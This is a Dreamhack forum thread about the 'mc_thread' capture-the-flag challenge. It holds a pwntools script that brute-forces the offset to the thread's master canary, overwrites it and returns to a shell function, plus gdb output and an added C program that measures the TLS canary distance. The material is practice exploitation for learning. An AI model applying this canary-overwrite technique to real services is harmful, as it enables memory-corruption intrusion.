Completed
Do I need to fuzz?

The exploit (the one Dreamhack shows in the Exploit Tech page) works perfectly locally, but on remote it doesn't work... I'm trying to brute-force the distance between the payload and the master canary. Here is my script:

```python
from pwn import *

context.log_level = 'debug'
elf = ELF('./mc_thread')            # load the binary once, not on every attempt

for i in range(400, 9000, 8):
    p = remote("host3.dreamhack.games", 17226)

    payload = b'A' * 264
    payload += b'A' * 8             # canary
    payload += b'B' * 8
    payload += p64(elf.symbols['giveshell'])
    payload += b'C' * (i - len(payload))
    payload += p64(0x404800 - 0x972)
    payload += b'C' * 0x10
    payload += p64(0x4141414141414141)

    inp_sz = len(payload) // 8

    p.sendlineafter(b'Size: ', str(inp_sz).encode())
    p.sendafter(b'Data: ', payload)
    p.sendline(b"cat flag")         # bytes, like the other sends
    data = p.recvallS(timeout=3)
    p.close()                       # release the connection before the next attempt
    if "DH{" in data:
        print(data)
        break
```

Is it overkill, and can I understand the distance there is on remote? Or do I really need to brute-force? Thanks in advance.

#system_hacking #master_canary #mc_thread
2 answers
wyv3rn

As you know, the offset can change according to the environment, so brute-forcing is necessary, I think.

2023.09.21. 21:42
FRACCHETTO

If run on the Dockerfile, the distance is kinda large, but the steps are also the ones shown in the Exploit Tech page...

```
(gdb) x/x $rbp-0x110
0x7ffff7d8bd40:	0x0000000000000000
(gdb) x/gx $fs_base+0x28
0x7ffff7d8c668:	0x8d3bade0f4598900
(gdb) p/x ($fs_base + 0x28) - 0x7ffff7d7dd40
$1 = 0xe928
```
2023.09.21. 22:07
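To see why the distance wyv3rn calls environment-dependent (and that FRACCHETTO measures with gdb) is fixed by the libc build rather than by anything the program itself controls, here is an added example, not from the challenge or from either poster: it measures, inside a freshly created thread, how far the TLS slot holding the master canary sits above a stack buffer. It assumes x86-64 glibc, where pthread_self() returns the TCB that fs points to and the canary lives at fs:0x28; the stack sizes tried are arbitrary constructed values.

```c
/* Added example: measure the distance from a thread's stack buffer to the
 * TLS slot that holds the master canary. On x86-64 glibc, fs points at the
 * TCB returned by pthread_self(), and tcbhead_t.stack_guard is at +0x28. */
#include <pthread.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define CANARY_TLS_OFFSET 0x28   /* x86-64 glibc specific */

struct probe {
    ptrdiff_t distance;          /* &canary_slot - &buf, filled in by the thread */
};

static void *probe_thread(void *arg)
{
    struct probe *pr = arg;
    volatile char buf[256];      /* stands in for a local buffer in the thread */
    buf[0] = 0;
    uintptr_t tcb = (uintptr_t)pthread_self();
    uintptr_t canary_slot = tcb + CANARY_TLS_OFFSET;
    pr->distance = (ptrdiff_t)(canary_slot - (uintptr_t)buf);
    return NULL;
}

/* Runs one probe thread with the requested stack size (0 = default) and
 * returns the measured distance, or -1 if the thread could not be created. */
ptrdiff_t canary_distance(size_t stack_size)
{
    struct probe pr = { 0 };
    pthread_attr_t attr;
    pthread_t th;
    pthread_attr_init(&attr);
    if (stack_size)
        pthread_attr_setstacksize(&attr, stack_size);
    if (pthread_create(&th, &attr, probe_thread, &pr) != 0)
        return -1;
    pthread_join(th, NULL);
    pthread_attr_destroy(&attr);
    return pr.distance;
}

int main(void)
{
    size_t sizes[] = { 0, 1 << 20, 8 << 20 };   /* constructed sample sizes */
    for (size_t i = 0; i < 3; i++)
        printf("stack size %8zu: canary slot is %td bytes above the buffer\n",
               sizes[i], canary_distance(sizes[i]));
    return 0;
}
```

The value stays the same across stack sizes because glibc places the TCB at the top of each thread's stack mapping and starts the thread just below it; what moves it between your machine and the Docker image is the libc build's TLS layout, which is why a locally measured offset does not carry over.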